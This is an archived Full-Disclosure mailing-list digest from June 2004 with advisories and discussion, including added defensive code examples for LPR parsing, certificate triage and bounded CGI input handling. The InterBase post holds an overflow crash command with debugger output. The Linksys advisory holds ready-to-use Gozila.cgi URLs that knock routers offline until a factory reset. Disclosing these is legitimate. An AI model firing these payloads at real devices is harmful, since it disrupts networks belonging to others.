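                raise ValueError("truncated file: expected %d bytes" % count)
            if stream[start + count:start + count + 1] != b"\x00":
                raise ValueError("missing NUL terminator after %r" % name)
            pos = start + count + 1
        if code == SUBCMD_CONTROL:
            job["control"] = parse_control_file(body)
        else:
            job["data"].append((name.decode("ascii"), body))
    return job


def job_is_complete(stream):
    """True if the stream parses as a whole job (useful for partial captures)."""
    try:
        parse_lpr_job(stream)
        return True
    except ValueError:
        return False


# Constructed sample: a small PostScript file and a typical control file.
SAMPLE_PS = (b"%!PS-Adobe-2.0\n"
             b"/Helvetica findfont 12 scalefont setfont\n"
             b"72 700 moveto (constructed sample) show\nshowpage\n")
SAMPLE_CONTROL = (b"Hworkstation\nPbrendan\nJreport.ps\n"
                  b"ldfA042workstation\nUdfA042workstation\nNreport.ps\n")
SAMPLE_STREAM = build_lpr_job("lp", "cfA042workstation", SAMPLE_CONTROL,
                              "dfA042workstation", SAMPLE_PS)

if __name__ == "__main__":
    job = parse_lpr_job(SAMPLE_STREAM)
    for name, body in job["data"]:
        print("queue %s: %s, %d bytes from %s" % (job["queue"], name, len(body), job["control"]["H"]))
```

Feeding the larger chaosreader .raw file to parse_lpr_job gives the data file as bytes, ready to be written out and checksummed, and the control file tells you which host and user submitted it, which is usually what the investigation wants to know anyway.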
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Jun 2004 12:45:09 -0400
Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate?
In-Reply-To: Your message of "Wed, 02 Jun 2004 07:39:31 +0930."
References:
Message-ID: <200406021645.i52Gj9F9012756@turing-police.cc.vt.edu>

On Wed, 02 Jun 2004 07:39:31 +0930, Chris van der Pennen said:
> I've been getting SSL certificates from various websites recently that are
> apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign.
> The certificate expired 6 December 2002.

> The data in Issued To and Issued By are identical.

> This smells very much like an SSL hijack attempt - can anyone shed some
> light on the situation?

Or some webserver package that builds a self-signed certificate so SSL works without having to pay Verisign, and does so in a "cute" manner that users are likely to accept the cert without thinking about it. It's probably NOT a hijack attempt unless you have *OTHER* evidence of that (phishy-looking redirect javascript on the page, etc....)

Given how little *real* security a signed cert creates, it's probably not worth worrying about.

From: nicola at delvacchio.it (Nicola Del Vacchio)
Date: Wed, 02 Jun 2004 19:26:58 +0200
Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate?
In-Reply-To: <200406021645.i52Gj9F9012756@turing-police.cc.vt.edu>
References: <200406021645.i52Gj9F9012756@turing-police.cc.vt.edu>
Message-ID: <1086197218.2916.16.camel@localhost>

it seems to me the fake certificates that a tool like ettercap issues. compare with this (fake) certificate.

cheers

nicola del vacchio
security consultant
genova italy
nicola at delvacchio.it

On Wed, 2004-06-02 at 18:45, Valdis.Kletnieks at vt.edu wrote:
> On Wed, 02 Jun 2004 07:39:31 +0930, Chris van der Pennen said:
> > I've been getting SSL certificates from various websites recently that are
> > apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign.
> > The certificate expired 6 December 2002.
>
> > The data in Issued To and Issued By are identical.
>
> > This smells very much like an SSL hijack attempt - can anyone shed some
> > light on the situation?
>
> Or some webserver package that builds a self-signed certificate so SSL works
> without having to pay Verisign, and does so in a "cute" manner that users are
> likely to accept the cert without thinking about it. It's probably NOT a hijack
> attempt unless you have *OTHER* evidence of that (phishy-looking redirect
> javascript on the page, etc....)
>
> Given how little *real* security a signed cert creates, it's probably not worth
> worrying about.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: fake-verisign-ca1.cer
Type: application/x-x509-ca-cert
Size: 691 bytes
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040602/22ecfade/attachment.bin

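What a cautious client should do with a certificate like the one in this thread (identical Issued To / Issued By, expired, issuer name one letter away from a real CA), as an added example that is not code from any of the posters or from a browser or TLS library. It assumes the X.509 fields have already been parsed into a dict shaped like the output of Python's ssl.SSLSocket.getpeercert(); the trust anchors and both certificates below are constructed.

```python
"""Triage a certificate presented by a web server, as a cautious client would.

Added example for the "VerySign Class 1 Authority" thread; not code from
the thread.  Assumption: subject/issuer/notAfter have already been parsed
out of the certificate (here as plain dicts and a getpeercert()-style
date string).  Trust anchors and sample certificates are constructed.
"""
from datetime import datetime, timezone

# Constructed trust anchors: (organizationName, commonName) of each CA cert.
# A real client verifies the issuer's signature against the anchor's key; the
# name comparison here is only the part that makes a look-alike name visible.
TRUSTED_ISSUERS = {
    ("VeriSign", "VeriSign Class 1 Public Primary Certification Authority"),
    ("Example Org", "Example Root CA"),
}

# Constructed to match the symptoms reported in the thread.
BOGUS_CERT = {
    "subject": {"organizationName": "VerySign", "commonName": "VerySign Class 1 Authority"},
    "issuer": {"organizationName": "VerySign", "commonName": "VerySign Class 1 Authority"},
    "notAfter": "Dec 06 23:59:59 2002 GMT",
}

# Constructed well-formed certificate chained to one of the anchors above.
GOOD_CERT = {
    "subject": {"organizationName": "Example Site", "commonName": "www.example.com"},
    "issuer": {"organizationName": "Example Org", "commonName": "Example Root CA"},
    "notAfter": "Jan 01 00:00:00 2006 GMT",
}

# The date of the thread, so the expiry check is reproducible.
THREAD_DATE = datetime(2004, 6, 2, tzinfo=timezone.utc)


def edit_distance(a, b):
    """Levenshtein distance, used to spot a CA name one typo away from a real one."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage_certificate(cert, trusted=TRUSTED_ISSUERS, now=None):
    """Return a list of findings; an empty list means the cert raised no flags."""
    now = now or datetime.now(timezone.utc)
    findings = []
    subject, issuer = cert["subject"], cert["issuer"]

    # "Issued To" equals "Issued By": self-signed, so nobody vouched for it.
    if subject == issuer:
        findings.append("self-signed: Issued To and Issued By are identical")

    not_after = datetime.strptime(cert["notAfter"], "%b %d %H:%M:%S %Y GMT")
    not_after = not_after.replace(tzinfo=timezone.utc)
    if not_after < now:
        findings.append("expired on %s" % not_after.date())

    issuer_pair = (issuer.get("organizationName", ""), issuer.get("commonName", ""))
    if issuer_pair not in trusted:
        findings.append("issuer %r is not a trust anchor" % (issuer_pair[1],))
        # A near-miss of a trusted name deserves a louder flag than a random one.
        for org, _cn in trusted:
            if edit_distance(issuer_pair[0].lower(), org.lower()) <= 2:
                findings.append("issuer organization %r looks like trusted CA %r"
                                % (issuer_pair[0], org))
    return findings


def should_accept(cert, now=None):
    """The decision a browser ought to make without asking the user."""
    return not triage_certificate(cert, now=now)


if __name__ == "__main__":
    for finding in triage_certificate(BOGUS_CERT, now=THREAD_DATE):
        print("-", finding)
```

The point Sebastian and Valdis make is that the decision belongs to the client, not to a popup: a certificate that fails any of these checks should simply not be accepted, whatever the dialog looks like.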
From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org)
Date: Wed, 2 Jun 2004 10:29:18 -0700
Subject: [Full-Disclosure] [SECURITY] [DSA 512-1] New gallery packages fix unauthenticated access
Message-ID: <20040602172918.GL19402@alcor.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 512-1                     security at debian.org
http://www.debian.org/security/                             Matt Zimmerman
June 2nd, 2004                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : gallery
Vulnerability  : unauthenticated access
Problem-Type   : remote
Debian-specific: no

A vulnerability was discovered in gallery, a web-based photo album written in php, whereby a remote attacker could gain access to the gallery "admin" user without proper authentication. No CVE candidate was available for this vulnerability at the time of release.

For the current stable distribution (woody), these problems have been fixed in version 1.2.5-8woody2.

For the unstable distribution (sid), these problems have been fixed in version 1.4.3-pl2-1.

We recommend that you update your gallery package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/g/gallery/gallery_1.2.5-8woody2.dsc
    Size/MD5 checksum:      573 1369280ce34db40a941ef4fae6f107a5
  http://security.debian.org/pool/updates/main/g/gallery/gallery_1.2.5-8woody2.diff.gz
    Size/MD5 checksum:     7575 109d81ad481a7b6a197b5dd5b2a3eeaf
  http://security.debian.org/pool/updates/main/g/gallery/gallery_1.2.5.orig.tar.gz
    Size/MD5 checksum:   132099 1a32e57b36ca06d22475938e1e1b19f9

Architecture independent components:

  http://security.debian.org/pool/updates/main/g/gallery/gallery_1.2.5-8woody2_all.deb
    Size/MD5 checksum:   137412 ebae6be30fe04acb993da74c9f54dcf0

These files will probably be moved into the stable distribution on its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAvg5kArxCt0PiXR4RAkWQAJ0beIP5URU0Wtz6oS21R35UniV8wwCgxUd2
SjSIIooMEHZjCAK2Lyxuc78=
=x+ya
-----END PGP SIGNATURE-----

From: koon at gentoo.org (Thierry Carrez)
Date: Wed, 02 Jun 2004 20:05:13 +0200
Subject: [Full-Disclosure] ERRATA: [ GLSA 200405-25 ] tla: Multiple vulnerabilities in included libneon
Message-ID: <40BE16D9.7000605@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [ERRATA UPDATE]           GLSA 200405-25:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: tla: Multiple vulnerabilities in included libneon
      Date: June 2, 2004
      Bugs: #51586
        ID: 200405-25:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The fixed ebuild proposed in the original version of this Security Advisory did not address all the vulnerabilities of the tla package. All users of the tla package should upgrade to dev-util/tla-1.2-r2. The corrected sections appear below.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /   Vulnerable   /               Unaffected
    -------------------------------------------------------------------
  1  dev-util/tla            <= 1.2-r1                   >= 1.2-r2
     dev-util/tla            == 1.2.1_pre1               >= 1.2-r2

Description
===========

Multiple format string vulnerabilities and a heap overflow vulnerability were discovered in the code of the neon library (GLSA 200405-01 and 200405-13). Current versions of the tla package include their own version of this library.

Resolution
==========

All users of tla should upgrade to the latest stable version:

    # emerge sync
    # emerge -pv ">=dev-util/tla-1.2-r2"
    # emerge ">=dev-util/tla-1.2-r2"

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200405-25.xml

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAvhbZvcL1obalX08RAjK1AKCRDB8GQ7OEplG5CyZhrMltMNDzBACfZhEs
U6ErjQqSEonelS5vE3aKy5I=
=EAkW
-----END PGP SIGNATURE-----

From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org)
Date: Wed, 2 Jun 2004 12:09:04 -0700
Subject: [Full-Disclosure] [SECURITY] [DSA 499-2] New rsync packages fix directory traversal bug
Message-ID: <20040602190904.GQ19402@alcor.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 499-2                     security at debian.org
http://www.debian.org/security/                             Matt Zimmerman
June 2nd, 2004                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : rsync
Vulnerability  : directory traversal
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2004-0426

A vulnerability was discovered in rsync, a file transfer program, whereby a remote user could cause an rsync daemon to write files outside of the intended directory tree. This vulnerability is not exploitable when the daemon is configured with the 'chroot' option.

This update includes an additional fix related to the original vulnerability.

For the current stable distribution (woody) this problem has been fixed in version 2.5.5-0.5.

For the unstable distribution (sid), this problem has been fixed in version 2.6.1-1.

We recommend that you update your rsync package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5.dsc
    Size/MD5 checksum:      545 94568a0080459dd6d8d84470a462b7dc
  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5.diff.gz
    Size/MD5 checksum:    92695 66730a221c5d2d175ea9f58b0a1bac86
  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5.orig.tar.gz
    Size/MD5 checksum:   415156 39d76c62684750842d3884a77c2e5466

Alpha architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_alpha.deb
    Size/MD5 checksum:   227712 cc3046698f1aa151efdccc1dce1cb9f4

ARM architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_arm.deb
    Size/MD5 checksum:   206610 2cbcbb999e404b8d65167fe1dc540c52

Intel IA-32 architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_i386.deb
    Size/MD5 checksum:   194854 62116c48c3ed4d29e110b35b92046761

Intel IA-64 architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_ia64.deb
    Size/MD5 checksum:   255716 90e274e9a84ab1703fe36bffee656712

HP Precision architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_hppa.deb
    Size/MD5 checksum:   214430 0e0ec89aeeb8e24335b1f8baf933bc6d

Motorola 680x0 architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_m68k.deb
    Size/MD5 checksum:   190008 9ac8acc88490fd3337a1a588702f0a2c

Big endian MIPS architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_mips.deb
    Size/MD5 checksum:   216470 fca9b734baf43b434e0bae182b879a6a

Little endian MIPS architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_mipsel.deb
    Size/MD5 checksum:   216746 1ca2e9a76353d4c30f0137cc6c385177

PowerPC architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_powerpc.deb
    Size/MD5 checksum:   205832 c9f08359ae6453e7f31b907aaa7dd960

IBM S/390 architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_s390.deb
    Size/MD5 checksum:   205090 0f9013705deb8a7c70b3d3a3995b722b

Sun Sparc architecture:

  http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_sparc.deb
    Size/MD5 checksum:   205542 1d8c456c899a37c52cafe20b30f87025

These files will probably be moved into the stable distribution on its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAviW/ArxCt0PiXR4RAq0xAJ46Z9xVC71WK7NaO/uvdopuVWueqQCgsnuC
cTAsMUOO2GOoREGty44NEa4=
=nl0I
-----END PGP SIGNATURE-----

From: roman at rs-labs.com (Roman Medina)
Date: Thu, 03 Jun 2004 00:10:05 +0200
Subject: [Full-Disclosure] Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability
In-Reply-To: <20040601235942.GS19402@alcor.net>
References: <20040601211332.GB1538@lupe-christoph.de> <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com> <20040601235942.GS19402@alcor.net>
Message-ID:

On Tue, 1 Jun 2004 16:59:42 -0700, you wrote:

>On Wed, Jun 02, 2004 at 01:49:01AM +0200, Roman Medina wrote:
>
>> In other words, many vendors/developers silently fix bugs and they don't
>> necessarily have to know who is packaging their software and inform them.
>
>this way. There is no need to contact every downstream vendor directly;
>they monitor the usual channels.

----
#include <stdio.h>

#ifdef _security_perspective_
#define usual_channels "bugtraq, other_lists"
#endif
#ifdef _devel_perspective_
#define usual_channels "changelog_file"
#endif

int main(void)
{
    /* build with -D_security_perspective_ or -D_devel_perspective_ */
    printf("My usual channels are: %s\n", usual_channels);
    return 0;
}
----

It was some kind of pseudocode :-)

Question: which perspective are Debian maintainers using to monitor their packages? In the particular case of SM, the old XSS issues were listed in ChangeLog, but the .deb package was not updated. Why?

Regards,
--Roman

--
PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

From: kf_lists at secnetops.com (KF (lists))
Date: Wed, 02 Jun 2004 22:03:51 -0400
Subject: [Full-Disclosure] Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow
In-Reply-To: <200406021043.25680.noamr@beyondsecurity.com>
References: <200406012040.14839.aviram@beyondsecurity.com> <3CF95025.7090202@secnetops.com> <200406021043.25680.noamr@beyondsecurity.com>
Message-ID: <40BE8707.6090707@secnetops.com>

Someone that has had some success communicating things security wise to Borland may wish to contact them about this.

[root at CloneRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm

[kf at CloneRiot bin]$ pwd
/opt/interbase/bin
[kf at CloneRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'`

(gdb) c
Continuing.
[New Thread 1085279152 (LWP 21355)]
[New Thread 1095769008 (LWP 21356)]
[New Thread 1106258864 (LWP 21357)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1085279152 (LWP 21355)]
0x41414141 in ?? ()
(gdb) bt
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
#2  0x41414141 in ?? ()
...
#35 0x41414141 in ?? ()
#36 0x41414141 in ?? ()
(gdb)
(gdb) i r
eax            0x0      0
ecx            0x82025e4        136324580
edx            0x0      0
ebx            0x81fe29c        136307356
esp            0x40aff5f8       0x40aff5f8
ebp            0x41414141       0x41414141
esi            0x12c    300
edi            0x40affab8       1085274808
eip            0x41414141       0x41414141
eflags         0x10246  66118
(gdb) x/1s $esp
0x40aff5f8:      'A'

[root at CloneRiot interbase]# ./bin/ibserver
Segmentation fault

-KF

Noam Rathaus wrote:
>On Sunday 02 June 2002 01:52, KF (lists) wrote:
>
>>So is this firebird specific or does it also impact Borland Interbase
>>users?
>>-KF
>>
>We haven't tested Borland's Interbase as we didn't have any installation
>available for testing. However I can assume that since this vulnerability
>appears in version 1.0.2, which is of very close resemblance to Borland's
>Interbase sources, that the vulnerability may also affect it.
>

From: etomcat at freemail.hu (Feher Tamas)
Date: Thu, 3 Jun 2004 09:23:42 +0200 (CEST)
Subject: [Full-Disclosure] Unidentified flying object code downs UK civilian airspace?
Message-ID:

http://news.bbc.co.uk/2/hi/uk_news/3772077.stm
http://www.cnn.com/2004/WORLD/europe/06/03/britain.flight/index.html

Massive air disruption across UK

Thousands of air passengers are facing delays after an air traffic control computer failure caused flights to be suspended across the UK.

National Air Traffic Services said flights were grounded so that controllers could prioritise on planes in the air, but safety was unaffected.

The air traffic control centre at West Drayton is now fully operational again but most flights remain on hold. Many airports are advising people to check in as normal but delays continue.

Adrian Yalland, spokesman for Nats, said: "Our computer system is now fully operational and safety being our primary concern we are now working to make sure those aircraft in the air and in need of landing should be able to do so to clear the delays."

He said the fault was thought to lie with the "flow of data" in the system. "The reasons why planes were grounded was because we couldn't let them into the air which would add more complications."

Mr Yalland added: "The system is not going to go down again."

[That could mean it is not going to be brought back online, ever. - me]

BBC transport correspondent Tom Symonds says the affected computer systems were not those that handle the separation of aircraft in the air. He says the fault was in what is known as the host control system, a two-year-old computer system at West Drayton. The system handles flight strips which are the basic details of flights coming in and out of the UK.

From: b0fnet at yahoo.com (b0f)
Date: Thu, 3 Jun 2004 01:31:06 -0700 (PDT)
Subject: [Full-Disclosure] DoS vuln in various versions of Linksys routers.
Message-ID: <20040603083106.3508.qmail@web14606.mail.yahoo.com>

Denial of Service Vulnerability in Linksys BEFSR41 - Router vuln was identified and tested on:

Linksys BEFSR41 v3
Linksys BEFSRU31
Linksys BEFSR11
Linksys BEFSX41
Linksys BEFSR81 v2/v3
Linksys BEFW11S4 v3
Linksys BEFW11S4 v4

Available from www.linksys.com

October 19, 2003 (Revised November 10, 2003)
Released Date: 3rd June 2004

NOTE: THIS ADVISORY WAS ORIGINALLY WRITTEN FOR THE Linksys BEFSR41 EtherFast Cable/DSL Router with 4-Port Switch

I. BACKGROUND

Linksys Group Inc.'s EtherFast Cable/DSL Router with 4-Port Switch "is the perfect option to connect multiple PCs to a high-speed Broadband Internet connection or to an Ethernet back-bone. Allowing up to 253 users, the built-in NAT technology acts as a firewall protecting your internal network." More information about it is available at http://www.linksys.com/products/product.asp?prid=20&grid=23

II. DESCRIPTION

It is possible for a remote/local attacker to crash the Linksys router and leave it in a state where it can't be accessed even after reboot due to an invalid password. An attacker could set up a web page or send an HTML email to someone inside the LAN to indirectly send commands to the router. An attacker could specify a URL that results in denial of service.

The DoS occurs when 2 long strings are sent to the sysPasswd and sysPasswdConfirm parameters of the Gozila.cgi script; about 150 characters to each parameter seems to work fine, if an attacker can get the admin of the router to view a link, or go to a web page that links to a link such as this:

http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&UPnP_Work=1&FactoryDefaults=0

The router will drop all internet connections, making the internet inaccessible from the LAN even if the router is powered off and back on. It also seems to change the password in such a way that the admin can't log back into the router, and the only way to solve it is by pressing the factory reset button on the front of the router, which will then reset all previously stored settings and reset the password back to the factory default 'admin'. The router would then need to be set back up again from scratch.

REVISED NOVEMBER 10, 2003

On November 10 2003 I found another overflow in the Linksys router which is a similar attack method to the first vuln in this advisory. The DoS occurs in this attack when a long string of about 350 characters is passed to the 'DomainName' parameter of the Gozila.cgi script. An example of this attack would be to get the admin of a router to visit a link like this:

http://192.168.1.1/Gozila.cgi?hostName=&DomainName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168&ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1

This would cause the router to crash, and the factory reset button on the front of the router would need to be pressed to restore it back to normal working order.

III. ANALYSIS

Exploitation may be particularly dangerous, especially if the router's remote management capability is enabled. It may also be easily exploited by fooling an admin of the router into clicking a link he/she thinks is valid. This is probably a vuln in older versions of the firmware.

IV. DETECTION

This vulnerability affects the BEFSR41 EtherFast Cable/DSL router with the latest firmware version 1.45.7. I also tested version 1.44.2z, which is also vuln, so probably all other versions below this are also vuln. It may also be possible that other versions of Linksys routers are vuln to this attack if they use the same type of management. I'm unable to confirm any other models that are vuln to this attack. The Linksys BEFSRU31 and BEFSR11 use the same version of firmware as the BEFSR41, so they are probably vuln.

NOTE ADDED June 3rd 2004: The vendor confirmed this vuln in all versions stated at the start of this advisory.

V. RECOVERY

Pressing the reset button on the front of the router and setting it back up from scratch should restore normal functionality to the router.

VI. WORKAROUND

Don't click untrusted links.

VII. VENDOR

19 Oct 2003: First vuln discovered.
10 Nov 2003: Second vuln discovered.
01 Dec 2003: Vendor contacted via security at linksys.com
01 Dec 2003: Response received from jay.price at linksys.com
10 Dec 2003: Issue turned over to project manager andreas.bang at linksys.com
17 Dec 2003: I was sent a beta release of the new firmware which fixed the vuln but had a bug where the logging function wouldn't work.
22 Dec 2003: andreas.bang at linksys.com has now moved office; now to contact anbang at cisco.com
29 Jan 2004: Was told patches would be up in the next week.
29 Feb 2004: They said there was a problem with the code, still no patches.
24 Mar 2004: Received an email about patches saying:

BEFSR41 v3 (post by 3/31)
BEFSX41 (posted)
BEFSR81 v2/v3 (in progress)
BEFW11S4 v3 (post by 3/31)
BEFW11S4 v4 (posted)

02 Jun 2004: Advisory released to public; still no patch for the Linksys BEFSR41 EtherFast Cable/DSL Router with 4-Port Switch
http://www.linksys.com/download/firmware.asp?fwid=3
The version this advisory was first written for still remains vuln to date.

b0f (Alan McCaig)
b0fnet at yahoo.com
www.b0f.net

=====
www.b0f.net

__________________________________
Do you Yahoo!?
Friends. Fun. Try the all-new Yahoo! Messenger.
http://messenger.yahoo.com/

From sudharsha at sms.lk Thu Jun 3 10:18:23 2004
From: sudharsha at sms.lk (sudharsha)
Date: Thu, 3 Jun 2004 15:18:23 +0600
Subject: [Full-Disclosure] watch guard
Message-ID: <006a01c4494b$b8c639b0$9f64a8c0@eng>

Hi all

Does any one know a vulnarability in Watch guard?

Rgds
Sudharsha

From pherman at frenchfries.net Thu Jun 3 00:41:16 2004
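The Linksys advisory above only reports the symptom: ~150 characters in sysPasswd/sysPasswdConfirm, or ~350 in DomainName, handed to Gozila.cgi leave the router unbootable until a factory reset, and a link in a web page or HTML mail is enough to deliver it because the admin's browser sends the request. It does not say what the firmware does with the values. The block below is an added example, not Linksys code and not taken from the advisory: it shows the handling an embedded CGI handler should have had, i.e. every value is bounded against the field it is going into before anything is stored, and an over-long value rejects the whole request rather than partially applying it. The parameter names come from the advisory's URLs; the field limits (MAX_PASSWD, MAX_DOMAIN) and the struct layout are assumptions made for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Field limits are assumptions made for this example. The advisory says
 * only that ~150 characters in sysPasswd/sysPasswdConfirm and ~350 in
 * DomainName crash the router, not what the firmware's real limits are. */
#define MAX_PASSWD 32
#define MAX_DOMAIN 64

struct router_form {
    char sys_passwd[MAX_PASSWD + 1];
    char sys_passwd_confirm[MAX_PASSWD + 1];
    char domain_name[MAX_DOMAIN + 1];
};

/* Query-string key -> destination field and capacity. Keys not listed here
 * (UPnP_Work, FactoryDefaults, hostName, ...) are ignored by this example. */
struct field_map {
    const char *key;
    size_t offset;
    size_t cap;
};

static const struct field_map fields[] = {
    { "sysPasswd",        offsetof(struct router_form, sys_passwd),         MAX_PASSWD },
    { "sysPasswdConfirm", offsetof(struct router_form, sys_passwd_confirm), MAX_PASSWD },
    { "DomainName",       offsetof(struct router_form, domain_name),        MAX_DOMAIN },
};

/* Parse "key=value&key=value" into f. Every value is bounded against its
 * field's capacity before anything is copied, so one over-long value
 * rejects the whole request and leaves f untouched. Returns 0 on success,
 * -1 on rejection. Percent-decoding is omitted; a real handler decodes
 * first and bounds the decoded length. */
int parse_router_query(const char *qs, struct router_form *f)
{
    struct router_form tmp;
    const char *p = qs;

    memset(&tmp, 0, sizeof tmp);
    while (*p) {
        const char *amp = strchr(p, '&');
        size_t pair_len = amp ? (size_t)(amp - p) : strlen(p);
        const char *eq = memchr(p, '=', pair_len);
        size_t key_len = eq ? (size_t)(eq - p) : pair_len;
        const char *val = eq ? eq + 1 : p + pair_len;
        size_t val_len = pair_len - key_len - (eq ? 1 : 0);

        for (size_t i = 0; i < sizeof fields / sizeof fields[0]; i++) {
            char *dst;
            if (strlen(fields[i].key) != key_len ||
                memcmp(fields[i].key, p, key_len) != 0)
                continue;
            if (val_len > fields[i].cap)
                return -1;            /* over-long value: reject, write nothing */
            dst = (char *)&tmp + fields[i].offset;
            memcpy(dst, val, val_len);
            dst[val_len] = '\0';
        }
        p = amp ? amp + 1 : p + pair_len;
    }
    *f = tmp;
    return 0;
}

/* A password change is only applied when both fields agree and are set,
 * which is what keeps the device from ending up with a password nobody
 * can type. */
int password_change_valid(const struct router_form *f)
{
    return f->sys_passwd[0] != '\0' &&
           strcmp(f->sys_passwd, f->sys_passwd_confirm) == 0;
}

int main(void)
{
    struct router_form f;
    char big[160], query[512];

    memset(big, 'A', 150);   /* constructed: the ~150-char value from the advisory */
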